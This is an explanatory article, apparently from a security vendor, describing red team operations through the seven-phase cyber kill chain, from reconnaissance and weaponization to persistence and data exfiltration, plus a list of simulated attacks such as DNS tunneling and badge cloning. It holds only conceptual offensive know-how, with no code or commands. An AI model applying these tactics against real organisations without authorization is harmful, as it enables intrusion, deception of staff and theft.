Red Team Operation Basics

Successful cyber-attacks typically go through the seven phases of cyber “kill-chain’ which includes exploitation of an existing vulnerability as a critical step. The term “kill-chain” originated from the armed forces to define the structure of an attack. A Red Team Operation is developed by organizations to discover security vulnerabilities using hands-on testing. Red Team operation uncovers flawed exposures and blind spots of processes and network safety. While penetration test focus on single application at a time; a Red Team operation tries to exploit a larger landscape and potential means of attack.

Red Team members follow the offensive method while Blue Team objective is to defend from a cyber security attack. Usually, the Blue Team is not aware of Red Team operations what, where and how of the plan. This is to ensure the whole operation is conducted is a realistic environment as possible.

What is Red Team Operation?

Red Team (or Teaming) comes under the level of assessment in the information security domain. Red Team members have to identify the risk to the network infrastructure of an organization as a measure of pre-evaluation. In order to determine such risks, it is the primary responsibility of Red Team operators to recognize potential threats or vulnerability. Various tools, whether open-source or commercial, can be used by Red Team operators to discover vulnerabilities and to exploit them to their advantage. The prime objectives are Exploit, Compromise and Circumvent.

Think like a hacker!!!

Hackers almost always possess an analytic and creative mindset. To compromise a security system, they devise ingenious and path-breaking methods. To achieve their goals, they devise serpentine and circuitous routes which are difficult to follow.

Red Team Operation Methodology

The “Cyber Kill Chain” concept delivers a comprehensive framework to conduct Red Team Operation. It is used a part of the Intelligence Driven Defense model.

1. Reconnaissance

The first phase in a Red Team operation is focused on collecting as much information as possible about the target. Reconnaissance, aka information gathering, is one of the most critical steps. This is done through the use of public tools such as Maltego, Spiderfoot, Intrigue, Shodan etc. Social media like LinkedIn, Google, Twitter, Facebook, Instagram etc. are also used to learn about the employees, their daily routine, habits and more. As a result, it is usually possible to learn a great deal about the target’s people, technology, surroundings and environment. This step also involves building or acquiring specific tools for the engagement.

2. Weaponization

An important phase in a Red Team operation focuses on collecting information about infrastructure, facilities and employees. Open-Source intelligence gathering can be quite telling about a target, its people, its facilities and its technical makeup, such as physical/logical security controls, foot traffic, terrain, infil/exfil points, etc. Through deep analysis, it begins to paint a picture of the target and its primary operations.

Effective weaponization involves preparation of the operation specific to the target taking into full account intel gathered from the reconnaissance stage. This commonly includes crafting custom malicious file payloads, prepping RFID cloners, configuring hardware trojans, acquiring social engineering costumes, creating falsified personas/companies and much more.

3. Delivery

The Delivery stage is a critical stage of the execution phase. This marks the active launch of the Red Team operation in totality. Here, Red Team consultants carry out the actions on the target(s) intended to reach the Red Team Operation’s goals. Things like physically cloning badges, social engineering face-to-face targets, analyzing cyber vulnerabilities, planting hardware trojans for remote network persistence, etc. Among one of the most important objectives is to note the best opportunities for exploitation.

4. Exploitation

Exploitation is exactly what it sounds like. At this point, the goal is to “break in” or compromise servers/apps/networks, bypass physical controls (i.e.: gates, fences, locks, radar, motion detection, cameras) and exploit target staff through social engineering by face-to-face, email, phone, fax or SMS. The exploitation stage enables the preparation for the escalation and installation phase.

5. Installation

The installation stage’s primary goal is to prepare for persistence. This could amount to cyber persistence or physical persistence, although cyber persistence is generally slightly more common. During this stage, Red Team establishes a beachhead by taking advantage of steps taken in the exploitation step. Things like privilege escalation on compromised servers, shells, malicious file payload installation, usage of physical key impressions and lock picked doors happen here.

6. Command and Control

Maintaining persistence is the goal for Command & Control. Also, cyber-focused Red Team takes steps to ensure remote access to exploited systems are stable and reliable. This sets the stage for data exfiltration and other post-exploitation tasks/goals. On the physical and social side, manipulating people into enabling circumvention of physical barriers in order to create backdoors into facilities are key objectives.

7. Actions on Objective

During this phase of a Red Team operation, the team aims to complete the mission and realize the agreed-upon objectives set by the client and Red Team Security. Actions on objective happens through lateral movement throughout the cyber environment as well as the physical facilities. Pivoting from compromised systems and from breached physical security controls all along capturing video, audio and photographic evidence supporting each finding discovered. Ultimately, the team aims to exfiltrate data, information or physical assets the target deems critically sensitive.

Some of the attacks stimulated during Red Team Operation

• Conduct remote attacks via the Internet
• DNS tunneling
• ICMP tunneling
• Intrusion attempts
• Insider threat
• VPN-based attacks
• Access card copy and strength test
• Identity spoof
• HID attack
• Fake WAP
• Spoofing
• Lazy/broken processes
• Zombies/bots
• Attack on physical security
• Stolen authentication tokens

Red Team Operation can help to improve the ability to defend against, and respond to, attacks that put business operations, data, and reputation at risk.